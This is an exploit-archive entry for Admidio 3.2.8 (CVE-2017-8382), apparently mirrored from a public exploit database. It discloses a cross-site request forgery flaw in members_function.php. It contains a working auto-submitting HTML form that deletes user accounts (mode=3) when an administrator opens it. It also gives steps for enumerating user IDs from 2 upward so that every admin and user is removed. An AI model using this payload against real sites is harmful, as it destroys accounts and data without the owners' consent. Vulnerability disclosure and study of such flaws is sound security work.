Skip to content
cyberexploits
webappphptext

Admidio 3.2.8 - Cross-Site Request Forgery

Admidio 3.2.8 - Cross-Site Request Forgery

Published on 2017-04-28

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/php/webapps/42005.txt7eac4c3a
raw
# Exploit Title :Admidio 3.2.8 (CSRF to Delete Users)

# Date: 28/April/2017

# Exploit Author: Faiz Ahmed Zaidi Organization: Provensec LLC Website: 

http://provensec.com/

# Vendor Homepage: https://www.admidio.org/

# Software Link: https://www.admidio.org/download.php

# Version: 3.2.8

# Tested on: Windows 10 (Xampp)

# CVE : CVE-2017-8382





[Suggested description]

Admidio 3.2.8 has CSRF in 

adm_program/modules/members/members_function.php with

  an impact of deleting arbitrary user accounts.



  ------------------------------------------



  [Additional Information]

  Using this crafted html form we are able to delete any user with 

admin/user privilege.



  <html>

    <body onload="javascript:document.forms[0].submit()">

      <form 

action="http://localhost/newadmidio/admidio-3.2.8/adm_program/modules/members/members_function.php">

        <input type="hidden" name="usr&#95;id" value='9' />

        <input type="hidden" name="mode" value="3" />

        </form>

    </body>

  </html>



[Affected Component]

  http://localhost/newadmidio/admidio-3.2.8/adm_program/modules/members/members_function.php



  ------------------------------------------



  [Attack Type]

  Remote



  ------------------------------------------



  [Impact Escalation of Privileges]

  true



  ------------------------------------------



  [Attack Vectors]

  Steps:

  1.) If an user with admin privilege opens a crafted

  html/JPEG(Image),then both the admin and users with user privilege

  which are mentioned by the user id (as like shown below) in the

  crafted request are deleted.



   <input type="hidden" name="usr&#95;id" value='3' />



  2.) In admidio by default the userid starts from '0',

  '1' for system '2' for users, so an attacker

  can start from '2' upto 'n' users.



  3.)For deleting the user permanently we select 'mode=3'(as like shown

  below),then all admin/low privileged users are deleted.



   <input type="hidden" name="mode" value="3" />



  ------------------------------------------



  [Reference]

  https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)



Thanks

Faiz Ahmed Zaidi





View on GitHub